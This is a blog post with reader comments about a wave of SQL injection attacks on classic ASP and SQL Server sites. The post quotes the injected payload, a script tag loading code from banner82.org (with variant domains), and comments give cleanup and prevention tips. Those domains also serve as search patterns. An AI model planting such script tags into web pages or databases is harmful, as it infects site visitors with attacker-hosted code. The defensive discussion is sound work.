Recent SQL Injection Attacks on ASP sites

There seems to be a number of SQL injection attacks happening lately involving adding of <script src=http://www.banner82.org/b.js></script>, adword71.com/b.js (and the likes ) to entries under string/text/varchar columns in the database targetting ASP (classic/3.0) sites and SQL Server. Note, they need not know your table or column names to mess up with you.

I definitely do not wish to play cops and robbers here but I wish to contribute a little on this. There are a number of articles on this (read along) and even more for preventing SQL injection and other related exploits such as cross-site scripting so help yourself.

As mentioned this is more targeted to ASP (classic/3.0) sites but posting nevertheless.

Read full article from Security alert : SQL injection attacks - banner82 script

Thanks to Robert Robbins post on rising SQL injection threats for making me think of cross posting here in weblogs.asp.net. I agree that this threat could be eliminated better with help/information from the community (if not MSFT itself)

4 Comments

  • To avoid the infection, you have to remove the sysobject & syscolumns rights from the database user in the GLOBAL.ASA, so the script cannot access anymore to the sys tables to list the database tables and columns and to infect them precisely; the script just won't execute itself !

    Then you'll have to remove every reference to the script inside the cells but without using REPLACE because ntext, text or image fields could have been altered.

    I recommend to use a script (ASP or PHP) to access the infected databases, table after table, column after column where you can find any script like '%banner82.com%' or '%adw95.com%' or '%/b.js%' etc... (there are many variants depending on the website or the name of the script 'b.js' or 'g.js' or '1.js'...).
    It would even be better to use regex inside SQL server queries but you have to use a UDF to do so (you could find some around by searching for 'SQL server 2000 regex').
    Once you found all occurencies you can UPDATE each field after a cleaning script.

    Then you're done !

  • Thanks so much for posting this script.

    I look after a micro business client who has a dynamic website running on an asp database which has been repeatedly attacked.

    I have been hassling him for months to do something. He finally commissioned a new site running secure php/mysql (hopefully!).

    Meanwhile, I have been left with trying to keep the existing site limping along for 6 weeks until the new system is ready.

    The script worked a treat.

    Again Many thanks

  • Yes this is latest threats to SWQL injection , but the older classic exploits top of the page are more suitable for the new comers who, dont have much understanding about the latest SQL injections.So try to have a look at the latest security exploits too.

  • Hi there just wanted to give you a quick heads up. The text in your content seem to be running off
    the screen in Ie. I'm not sure if this is a formatting issue or something to do with browser compatibility but I figured I'd post to let you know.

    The layout look great though! Hope you get the problem solved
    soon. Thanks

Comments have been disabled for this content.